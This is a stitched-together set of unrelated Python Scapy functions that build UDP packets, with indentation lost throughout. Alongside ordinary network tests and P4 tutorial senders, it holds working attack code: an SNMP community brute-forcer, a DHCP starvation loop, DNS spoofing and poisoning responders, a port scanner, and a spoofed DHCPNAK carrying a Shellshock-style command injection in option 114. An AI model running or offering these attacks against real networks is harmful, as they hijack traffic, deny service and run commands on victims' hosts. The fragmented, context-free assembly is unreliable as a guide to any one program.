def test_02_unknown_redirected_through_chain(self):
pkt = \
IP(dst=self.PROXY_HOST) / \
UDP(sport=12345, dport=19523) / \
GLBGUE(private_data=GLBGUEChainedRouting(hops=[self.ALT_HOST, self.SELF_HOST])) / \
IP(src=self.SELF_HOST, dst=self.VIP) / \
TCP(sport=9999, dport=22, flags='A')
# expect the packet to arrive back to us as a FOU packet since nobody knew about the connection
# should arrive from the last host in the chain that wasn't us.
resp_ip = self._sendrecv4(
pkt, filter='host {} and udp and port 19523'.format(self.ALT_HOST))
assert isinstance(resp_ip, IP)
assert_equals(
resp_ip.src,
self.ALT_HOST) # outer FOU will come from penultimate hop
assert_equals(resp_ip.dst, self.SELF_HOST)
resp_fou = resp_ip.payload
assert isinstance(resp_fou, UDP)
assert_equals(resp_fou.sport, 12345)
assert_equals(resp_fou.dport, 19523)
resp_gue = resp_fou.payload
assert isinstance(resp_gue, GLBGUE)
resp_inner_ip = resp_gue.payload
assert isinstance(resp_inner_ip, IP)
assert_equals(resp_inner_ip.src, self.SELF_HOST)
assert_equals(resp_inner_ip.dst, self.VIP)
resp_inner_tcp = resp_inner_ip.payload
assert isinstance(resp_inner_tcp, TCP)
assert_equals(resp_inner_tcp.sport, 9999)
assert_equals(resp_inner_tcp.dport, 22)
def test_task08(riot_ctrl, log_nodes):
node = riot_ctrl(0, APP, Shell, port=TAP)
host_netif = bridge(TAP)
host_lladdr = get_link_local(host_netif)
node_netifs = NETIF_PARSER.parse(node.ifconfig_list())
node_netif = next(iter(node_netifs))
node_hwaddr = node_netifs[node_netif]["hwaddr"]
node_lladdr = [
addr["addr"] for addr in node_netifs[node_netif]["ipv6_addrs"]
if addr["scope"] == "link"
][0]
ip_addr_add(host_netif, "beef::1/64")
ip_route_add(host_netif, "affe::/64", node_lladdr)
node.nib_route_add(node_netif, "beef::/64", host_lladdr)
node.nib_route_add(node_netif, "affe::/64", "fe80::ab25:f123")
pkt = srp1(Ether(dst=node_hwaddr) /
IPv6(src="beef::1", dst="affe::1", hlim=1) / UDP(dport=48879),
iface=host_netif,
timeout=5,
verbose=log_nodes)
assert ICMPv6TimeExceeded in pkt
assert pkt[ICMPv6TimeExceeded].code == 0
assert pkt[IPv6].src == node_lladdr
def test_task09(riot_ctrl, log_nodes):
node = riot_ctrl(0, APP, Shell, port=TAP)
host_netif = bridge(TAP)
host_lladdr = get_link_local(host_netif)
node_netifs = NETIF_PARSER.parse(node.ifconfig_list())
node_netif = next(iter(node_netifs))
node_hwaddr = node_netifs[node_netif]["hwaddr"]
node_lladdr = [
addr["addr"] for addr in node_netifs[node_netif]["ipv6_addrs"]
if addr["scope"] == "link"
][0]
ip_addr_add(host_netif, "beef::1/64")
ip_route_add(host_netif, "affe::/64", node_lladdr)
node.nib_route_add(node_netif, "beef::/64", host_lladdr)
node.nib_route_add(node_netif, "affe::/64", "fe80::ab25:f123")
pkt = srp1(Ether(dst=node_hwaddr) /
IPv6(src="beef::1", dst="affe::1", plen=20) / UDP(dport=48879),
iface=host_netif,
timeout=5,
verbose=log_nodes)
assert ICMPv6ParamProblem in pkt
assert pkt[ICMPv6ParamProblem].code == 0
err_bytes = raw(pkt[IPerror6])
ptr = pkt[ICMPv6ParamProblem].ptr
# plen is a 2 byte field in network byte order (big endian)
ptr_val = (err_bytes[ptr] << 8) | err_bytes[ptr + 1]
assert ptr_val == 20
assert pkt[IPv6].src == node_lladdr
def __init__(self):
self.Ether = Ether()
self.IP = IP()
self.ARP = ARP()
self.TCP = TCP()
self.UDP = UDP()
self.ICMP = ICMP()
def test_task07(riot_ctrl, log_nodes):
node = riot_ctrl(0,
APP,
Shell,
cflags="-DCONFIG_GNRC_IPV6_NIB_SLAAC=1 "
"-DCONFIG_GNRC_IPV6_NIB_QUEUE_PKT=1",
termflags="-z [::]:17755",
modules="socket_zep",
port=TAP)
host_netif = bridge(TAP)
host_lladdr = get_link_local(host_netif)
time.sleep(5)
node_netifs = NETIF_PARSER.parse(node.ifconfig_list())
node_netif = [n for n in node_netifs if node_netifs[n]["mtu"] == 1500][0]
fwd_netif = [n for n in node_netifs if node_netifs[n]["mtu"] < 1500][0]
node_hwaddr = node_netifs[node_netif]["hwaddr"]
node_lladdr = [
addr["addr"] for addr in node_netifs[node_netif]["ipv6_addrs"]
if addr["scope"] == "link"
][0]
ip_addr_add(host_netif, "beef::1/64")
ip_route_add(host_netif, "affe::/64", node_lladdr)
node.nib_route_add(node_netif, "beef::/64", host_lladdr)
node.nib_route_add(fwd_netif, "affe::/64", "fe80::ab25:f123")
pkt = srp1(Ether(dst=node_hwaddr) / IPv6(src="beef::1", dst="affe::1") /
UDP(dport=48879) / ("x" * 1452),
iface=host_netif,
timeout=5,
verbose=log_nodes)
assert ICMPv6PacketTooBig in pkt
assert pkt[ICMPv6PacketTooBig].code == 0
assert node_netifs[fwd_netif]["mtu"] == pkt[ICMPv6PacketTooBig].mtu == 1280
assert pkt[IPv6].src == node_lladdr
def scapy_send_dns_requests(number_of_packets):
for _ in range(number_of_packets):
dns_request = Ether(src=ethernet_src, dst=ethernet_dst) /\
IP(src=ip_src, dst=ip_dst) /\
UDP(dport=53, sport=randint(1024, 65535)) /\
DNS(id=randint(1, 1000), rd=1, qd=DNSQR(qname="www." + str(randint(1, 1000)) + ".com"))
sendp(dns_request, verbose=False)
def cmd_snmp_crack(ip, port, stop, verbose):
FILEDIR = os.path.dirname(os.path.abspath(__file__))
DATADIR = os.path.abspath(os.path.join(FILEDIR, '../data'))
COMMFILE = Path(os.path.abspath(os.path.join(DATADIR, 'dict_snmp.txt')))
with COMMFILE.open() as cf:
communities = cf.read().split('\n')
conf.verb = False
pkt = IP(dst=ip)/UDP(sport=port, dport=port)/SNMP(community="public", PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1"))]))
for community in communities:
if verbose:
print('.', end='')
sys.stdout.flush()
pkt[SNMP].community=community
ans = sr1(pkt, timeout=0.5, verbose=0)
if ans and UDP in ans:
print('\nCommunity found:', community)
if stop:
break
return True
def modify(packet):
pkt = IP(packet.get_payload())
if pkt.qd.qname == b'facebook.com.':
print(pkt.show())
p = Ether(
dst=self.MacList[0], src=self.LocalMac,
type=2048) / IP(src=pkt[IP].dst, dst=pkt[IP].src) / UDP(
sport=53, dport=pkt[UDP].sport) / DNS(
id=pkt[DNS].id,
qr=1,
qdcount=1,
ancount=1,
nscount=0,
arcount=0,
qd=DNSQR(
qname=pkt[DNS].qd.qname, qtype=1, qclass=1),
an=DNSRR(rrname=pkt[DNS].qd.qname,
type=1,
rclass=1,
rdata=ip),
ns=None,
ar=None)
sendp(p, verbose=0)
#packet.set_payload(bytes(str(pkt), 'utf-8')) #set the packet content to our modified version
packet.drop() #drop the packet
else:
packet.accept()
def is_up_udp(ip):
icmp = IP(dst=ip) / UDP(dport=0)
resp = sr1(icmp, timeout=0.5, verbose=False)
if resp == None:
return False
else:
return True
def __init__(self, ip_src_address, ip_dst_address):
"""
Initialize packet crafter. Create headers and template.
"""
self.header = IP(src=ip_src_address, dst=ip_dst_address) / UDP()
self.netflow_header = NetflowHeader() / NetflowHeaderV9()
self.flowset = NetflowFlowsetV9(
templates=[
NetflowTemplateV9(
template_fields=[
NetflowTemplateFieldV9(fieldType=1,
fieldLength=1), # IN_BYTES
NetflowTemplateFieldV9(fieldType=2,
fieldLength=4), # IN_PKTS
NetflowTemplateFieldV9(fieldType=4), # PROTOCOL
NetflowTemplateFieldV9(fieldType=8), # IPV4_SRC_ADDR
NetflowTemplateFieldV9(fieldType=12), # IPV4_DST_ADDR
NetflowTemplateFieldV9(fieldType=7), # L4_SRC_PORT
NetflowTemplateFieldV9(fieldType=11), # L4_DST_PORT
NetflowTemplateFieldV9(fieldType=6), # TCP_FLAGS
NetflowTemplateFieldV9(fieldType=5), # TOS
],
templateID=256,
fieldCount=9)
],
flowSetID=0)
self.recordClass = GetNetflowRecordV9(self.flowset)
def craft_and_send(pkt,
dns_type,
segment=None,
is_hb=False,
real_response=None):
"""
Craft a spoofed dns response and send it.
"""
spf_ip = IP(dst=pkt[IP].src)
spf_udp = UDP(dport=pkt[UDP].sport, sport=53)
if real_response:
spf_resp = spf_ip / spf_udp / real_response[DNS]
else:
spf_dnsqr = DNSQR(qname=pkt[DNSQR].qname, qtype=dns_type)
spf_dnsrr = DNSRR(rrname=pkt[DNSQR].qname, ttl=232, type=dns_type)
if segment:
spf_dnsrr.rdata = segment
if is_hb:
global hb_ip
spf_dnsrr.rdata = hb_ip
spf_dns = DNS(qr=1, id=pkt[DNS].id, qd=spf_dnsqr, an=spf_dnsrr)
spf_resp = spf_ip / spf_udp / spf_dns
global iface
send(spf_resp, verbose=0, iface=iface)
def __init__(
self,
target: str,
protocol: str = "icmp",
max_ttl: int = 30,
timeout: int = 5,
stealth: bool = False,
) -> None:
self.hops = []
self.max_ttl = max_ttl
self.protocol = protocol
self.target = target
self.time = str(datetime.now())
self.timeout = timeout
self.protocol = protocol
self.stealth = stealth
payloads = {
"icmp": ICMP(),
"tcp": TCP(dport=53, flags="S"),
"udp": UDP() / DNS(qd=DNSQR(qname=self.target)),
"http": TCP(dport=80, flags="S"),
"tls": TCP(dport=443, flags="S"),
}
self.payload = payloads.get(self.protocol)
self.run()
return
def port_scan(self, protocol, ip, port_list):
self.semaphore.acquire()
with self.concurrent_threads_lock:
self.concurrent_threads.add(threading.currentThread().getName())
if self.verbose:
self.thread_monitoring()
for port in self.port_list:
if protocol == 'tcp':
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(TCP_TIMEOUT)
result = s.connect_ex((ip, port))
if result == 0:
port_data = ('%s/%s' % (port, self.services_dict[port])
if port in self.services_dict else port)
port_list.append(port_data)
except socket.error:
pass
finally:
s.close()
elif protocol == 'udp':
udp_scan_resp = sr1(IP(dst=ip) / UDP(dport=port),
timeout=TCP_TIMEOUT,
verbose=False)
if udp_scan_resp and udp_scan_resp.haslayer(UDP):
port_data = ('%s/%s' % (port, self.services_dict[port])
if port in self.services_dict else port)
port_list.append(port_data)
with self.concurrent_threads_lock:
self.concurrent_threads.remove(threading.currentThread().getName())
self.semaphore.release()
if self.verbose:
self.thread_monitoring()
def main():
if len(sys.argv) < 2:
print 'pass 2 arguments: <destination>'
exit(1)
addr = socket.gethostbyname(sys.argv[1])
iface = get_if()
print "sending on interface %s to %s" % (iface, str(addr))
while True:
print
s = str(
raw_input('Type space separated switch_ids nums '
'(example: "2 3 2 2 1") or "q" to quit: '))
if s == "q":
break
print
i = 0
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff')
for p in s.split(" "):
try:
pkt = pkt / SourceRoute(last_header=0, swid=int(p))
i = i + 1
except ValueError:
pass
if pkt.haslayer(SourceRoute):
pkt.getlayer(SourceRoute, i).last_header = 1
pkt = pkt / IP(dst=addr) / UDP(dport=4321, sport=1234)
pkt.show2()
sendp(pkt, iface=iface, verbose=False)
def cmd_dhcp_starvation(iface, timeout, sleeptime, verbose):
conf.verb = False
if iface:
conf.iface = iface
conf.checkIPaddr = False
ether = Ether(dst="ff:ff:ff:ff:ff:ff")
ip = IP(src="0.0.0.0",dst="255.255.255.255")
udp = UDP(sport=68, dport=67)
dhcp = DHCP(options=[("message-type","discover"),"end"])
while True:
bootp = BOOTP(chaddr=str(RandMAC()))
dhcp_discover = ether / ip / udp / bootp / dhcp
ans, unans = srp(dhcp_discover, timeout=1) # Press CTRL-C after several seconds
for _, pkt in ans:
if verbose:
print(pkt.show())
else:
print(pkt.sprintf(r"%IP.src% offers %BOOTP.yiaddr%"))
sleep(sleeptime)
def test_tamper_udp():
"""
Tests tampering with UDP
"""
packet = actions.packet.Packet(
IP(src='127.0.0.1', dst='127.0.0.1') / UDP(sport=2222, dport=53))
original = copy.deepcopy(packet)
tamper = actions.tamper.TamperAction(None,
field="chksum",
tamper_type="replace",
tamper_value=4444,
tamper_proto="UDP")
lpacket, rpacket = tamper.run(packet, logger)
assert not rpacket, "Tamper must not return right child"
assert lpacket, "Tamper must give a left child"
assert id(lpacket) == id(packet), "Tamper must edit in place"
# Confirm tamper replaced the field it was supposed to
assert packet[UDP].chksum == 4444, "Tamper did not replace flags."
# Confirm tamper didn't corrupt anything in the TCP header
assert confirm_unchanged(packet, original, UDP, ["chksum"])
# Confirm tamper didn't corrupt anything else in the IP header
assert confirm_unchanged(packet, original, IP, [])
def UDP_layer(attributes):
layer4 = UDP()
layer4.sport = attributes['sport']
layer4.dport = attributes['dport']
layer4.len = attributes['len']
return layer4
def nak_request(self, packet):
# we are hereby handling the case where we detect one other dhcp server besides our own...
dhcp_server_mac = self.other_dhcp_servers.keys()[0]
dhcp_server_ip = self.other_dhcp_servers[
self.other_dhcp_servers.keys()[0]]
print "Spoofing DHCPNAK from %s / %s" % (dhcp_server_mac,
dhcp_server_ip)
nak = Ether(src=dhcp_server_mac, dst=packet[Ether].dst) / \
IP(src=dhcp_server_ip, dst=packet[IP].dst) / \
UDP(sport=67, dport=68) / \
BOOTP(op=2,
ciaddr=packet[IP].src,
siaddr=packet[IP].dst,
chaddr=packet[Ether].src,
xid=packet[BOOTP].xid) / \
DHCP(options=[
('server_id', dhcp_server_ip),
('message-type','nak'),
(114, "() { ignored;}; touch /tmp/test"),
('end')]
)
print "sending NAK:"
nak.show()
scapy.all.sendp(nak)
def uplink(pkt):
if IPv6 in pkt:
#if UDP in pkt and pkt[UDP].dport == 2152:
#if UDP in pkt:
#if pkt.nh == 43:
# pkt.addresses=["fc00::4","fc00::1","fc00::99"]
print "got a packet"
pkt.show()
#5G PACKET
pkt5g = Ether(src='00:15:5d:00:00:00', dst='00:15:5d:00:00:04') / IPv6(
src="fc00::1", dst="fc00::5") / IPv6ExtHdrRouting(
type=4,
segleft=2,
addresses=["fc00::5", "fc00::101", "fc00::100"]) / UDP(
sport=64515, dport=2152) / GTP_U_Header(
TEID=32, Reserved=0, E=1) / dl_pdu_session(gtp_ext=133,
QoSID=14)
#Full packet (5G + USER DATA)
pkt2 = pkt5g / pkt[IPv6]
print "packet sent"
pkt2.show()
sendp(pkt2, iface="eth1", verbose=False)
pkt3 = pkt2[dl_pdu_session]
pkt4 = pkt3[IPv6]
pkt4.show()
main()
def main():
if len(sys.argv) < 3:
print('pass 2 arguments: <destination> "<message>"')
exit(1)
addr = socket.gethostbyname(sys.argv[1])
iface = get_if()
pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP(
dst=addr, options=IPOption_MRI(count=0, swtraces=[])) / UDP(
dport=4321, sport=1234) / sys.argv[2]
# pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP(
# dst=addr, options = IPOption_MRI(count=2,
# swtraces=[SwitchTrace(swid=0,qdepth=0), SwitchTrace(swid=1,qdepth=0)])) / UDP(
# dport=4321, sport=1234) / sys.argv[2]
pkt.show2()
#hexdump(pkt)
try:
for i in range(int(sys.argv[3])):
sendp(pkt, iface=iface)
sleep(1)
except KeyboardInterrupt:
raise
def send_ack(pkt):
iface = get_if()
ack = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff")
ack = ack / IP(dst=pkt[IP].src, proto=17) / UDP(dport=4322, sport=1235) / MRI(count=pkt[MRI].count, swtraces=pkt[MRI].swtraces)
ack.show2()
sendp(ack, iface=iface, verbose=False)
print ("ACK sent")
def dns_poison(pkt):
# return if the packet does not have a DNS layer
if not pkt.haslayer(DNSQR): return
qd = pkt[DNS].qd
# return if not a dns query or does not have a qtype of "A"
if pkt[DNS].qr != 0 or qd.qtype != 1: return
# dns answer with spoofed ip
dns_an = DNSRR(rrname=qd.qname, type="A", ttl=30, rdata=poison_ip)
sendp(
Ether() / # empty Ether packet makes it work (idk why?)
IP(src=pkt[IP].dst, dst=pkt[IP].src) / # switch IP src and dst
UDP(sport=pkt[UDP].dport, dport=pkt[UDP].sport)
/ # switch udp sport and dport
DNS(id=pkt[DNS].id,
qr=1,
aa=1,
ad=1,
ra=0,
an=dns_an,
ancount=1,
qd=qd), # spoofed dns packet
iface=interface,
verbose=0)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('ip_addr',
type=str,
help="The destination IP address to use")
parser.add_argument('message',
type=str,
help="The message to include in packet")
parser.add_argument(
'--dst_id',
type=int,
default=None,
help=
'The myTunnel dst_id to use, if unspecified then myTunnel header will not be included in packet'
)
args = parser.parse_args()
addr = socket.gethostbyname(args.ip_addr)
dst_id = args.dst_id
iface = get_if()
if (dst_id is not None):
payload = Raw(load="Today is a good day, you bloody wanker.")
inner_udp = UDP(dport=80, sport=1117)
inner_ip = IP(dst="8.8.8.8", src="45.45.0.11")
inner_headers = inner_ip / inner_udp / payload
gtp_string = '03ff' + '%04x' % len(inner_headers) + '01234567'
#gtp_inner_headers = Raw(load=bytes.fromhex(gtp_string))/inner_headers
gtp_inner_headers = Raw(load=gtp_string.decode("hex")) / inner_headers
outer_udp = UDP(dport=2152, sport=random.randint(49152, 65535))
outer_ip = IP(dst=addr)
print "sending UDP"
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff')
#pkt = pkt / IP(dst=addr) / UDP(dport=2152, sport=random.randint(49152,65535)) / IP(dst='12.3.4.5',src='10.0.0.1') / UDP(dport=8000, sport=8001) / args.message
pkt = pkt / outer_ip / outer_udp / gtp_inner_headers
else:
print "sending on interface {} to IP addr {}".format(iface, str(addr))
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff')
pkt = pkt / IP(dst=addr) / TCP(
dport=1234, sport=random.randint(49152, 65535)) / args.message
pkt.show2()
# hexdump(pkt)
# print "len(pkt) = ", len(pkt)
sendp(pkt, iface=iface, verbose=False)
def test_tunSlipSend():
"""
Test SLIP data sent over the TUN adapter and serial port.
Start a TUN adapter and send data over it while a thread runs to receive
data sent over the tunnel and promptly send it over a serial port which is
running a serial loopback test. Ensures data at the end of the loopback
test is valid when received over serial. This test does not cover serial
to TUN/IP nor IP to TUN data validation.
"""
# Create a test serial port
serialPort = SerialTestClass()
# Configure destination IP:port
destHost = '10.0.0.2'
destPort = 9999
# Start the monitor
TUNMonitor = faraday.Monitor(serialPort=serialPort)
# Create an IP packet to send from TUN IP:port (arbitrary) to dest IP:port
srcPacket = (IP(dst=destHost,
src=TUNMonitor._TUN._tun.addr) /
UDP(sport=9998,
dport=destPort) / "Hello, world!").__bytes__()
# Use scapy to send packet over Faraday
sendp(srcPacket, iface=TUNMonitor._TUN._tun.name)
# Manually check TUN adapter for packets in the tunnel
# This is necessary because the threads are not running
while True:
# Loop through packets until correct packet is returned
packet = TUNMonitor.checkTUN()
if packet:
# Strip etherType off of IP packet
ipPacketSerialTX = packet[4:]
if IP(ipPacketSerialTX).dst == destHost:
# Check that packet got through TUN without error
break
# Obtained IP packet to destination IP so check that it hasn't changed
assert ipPacketSerialTX == srcPacket
# Manually send IP packet over serial port including etherType.
bytesSent = TUNMonitor.txSerial(packet)
assert bytesSent is not None # We expect some data sent
assert bytesSent > len(packet) # We expect SLIP encoding to add bytes
# Receive data over serial port and check packets for test IP packet
rxBytes = TUNMonitor.rxSerial(TUNMonitor._TUN._tun.mtu)
for item in rxBytes:
ipPacketSerialRX = item[4:]
# Iterate through packets and check for packet to destination IP
if IP(ipPacketSerialRX).dst == destHost:
# Found IP packet to destination so break from loop
break
# Check that the packet received over the serial loopback == same as sent
assert ipPacketSerialRX == ipPacketSerialTX
def test_control_a_lookup(self):
question = IP(dst=self.controlResolverAddr) / \
UDP() / \
DNS(rd=1, qd=DNSQR(qtype="A", qclass="IN", qname=self.hostname))
log.msg("Performing query to %s with %s:%s" %
(self.hostname, self.controlResolverAddr,
self.controlResolverPort))
yield self.sr1(question)
def _reset_conn(self, sport, dport, seq):
rst = \
IP(dst=self.ALT_HOST) / \
UDP(sport=12345, dport=19523) / \
GLBGUE(private_data=GLBGUEChainedRouting(hops=[])) / \
IPv6(src=self.SELF_HOST_V6, dst=self.VIP) / \
TCP(sport=sport, dport=dport, flags='R', seq=seq)
send(rst)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('ip_addr',
type=str,
help="The destination IP address to use")
parser.add_argument('message',
type=str,
help="The message to include in packet")
parser.add_argument(
'--detnet_identifire',
type=int,
default=None,
help=
'If unspecified do not include any detnet header otherwise, send with the detnet itentifire'
)
parser.add_argument('count',
type=int,
help="Number of packets need to be sent")
args = parser.parse_args()
addr = socket.gethostbyname(args.ip_addr)
detnet_identifire = args.detnet_identifire
iface = get_if()
if (detnet_identifire is not None):
print "sending the packets with detnet header".format(
iface, str(detnet_identifire))
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff')
pkt = pkt / MyDetnet(detnet_identifire=detnet_identifire) / IP(
dst=addr, options=IPOption_MRI(count=0, swtraces=[])) / UDP(
dport=4321, sport=1234) / args.message
else:
print "sending on interface {} to IP addr {}".format(iface, str(addr))
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff')
pkt = pkt / IP(dst=addr, options=IPOption_MRI(
count=0, swtraces=[])) / UDP(dport=4321, sport=1234) / args.message
pkt.show2()
# hexdump(pkt)
# print "len(pkt) = ", len(pkt)
try:
for i in range(args.count):
sendp(pkt, iface=iface)
sleep(1)
except KeyboardInterrupt:
raise
def udp_sr1(test_params, udp_test, dtls_wrap=False):
"""Send UDP test message to server using UDP protocol and parses response."""
response = None
sent_time = test_params.report_sent_packet()
if not dtls_wrap:
if test_params.ip_version == 4:
udp_test_packet = IP() / UDP() / Raw(udp_test)
udp_test_packet[IP].src = test_params.src_endpoint.ip_addr
udp_test_packet[IP].dst = test_params.dst_endpoint.ip_addr
elif test_params.ip_version == 6:
udp_test_packet = IPv6() / UDP() / Raw(udp_test)
udp_test_packet[IPv6].src = test_params.src_endpoint.ipv6_addr
udp_test_packet[IPv6].dst = test_params.dst_endpoint.ip_addr
udp_test_packet[UDP].sport = test_params.src_endpoint.port
udp_test_packet[UDP].dport = test_params.dst_endpoint.port
del udp_test_packet[UDP].chksum
# if test_params.verbose:
# udp_test_packet.show()
if test_params.timeout_sec == 0:
test_params.timeout_sec = 0.0001
response = sr1(
udp_test_packet,
verbose=test_params.verbose,
timeout=test_params.timeout_sec,
retry=test_params.nr_retries,
)
if response:
print_verbose(test_params,
"Received response - size: {}".format(len(response)))
test_params.report_received_packet(sent_time)
else:
# do_patch()
if test_params.ip_version == 4:
sock = ssl.wrap_socket(
socket.socket(socket.AF_INET, socket.SOCK_DGRAM),
ssl_version=ssl.PROTOCOL_TLSv1_2,
)
sock.connect((test_params.dst_endpoint.ip_addr,
test_params.dst_endpoint.port))
sock.send(udp_test)
response = IP() / UDP() / Raw(sock.recv())
if response:
test_params.report_sent_packet(sent_time)
# sock.close()
return response
def gen_pkt(d):
return ( Ether(src=':'.join("%02x" % (srand.randint(0,255),) for _ in range(6)),
dst=':'.join("%02x" % (srand.randint(0,255),) for _ in range(6)))
/ IP(src=d['sip'],
dst=gen_ip())
/ UDP(sport=int(d['vport']),
dport=srand.randint(10000,65000))
/ Raw(load=gen_invite(d)))
def create_pkg(n):
packet = IP(dst=args.h, src=args.h, ttl=args.t)/UDP(sport=args.p-1,dport=args.p,ack=0,pkg=n)
packet=IP(raw(packet))
#print(list(expand(packet))) if we want to have a look inside the layers of the package
print('Sending packet '+str(packet[UDP].pkg))
sendp(Ether()/packet, iface=args.i,verbose=False)
a_s=sniff(iface=args.i, prn=ack,lfilter=lambda p: any(proto in p and (p[proto].dport in [args.p-1]) for proto in [UDP]), timeout=args.t, stop_filter =lambda x: x.haslayer(UDP))
return
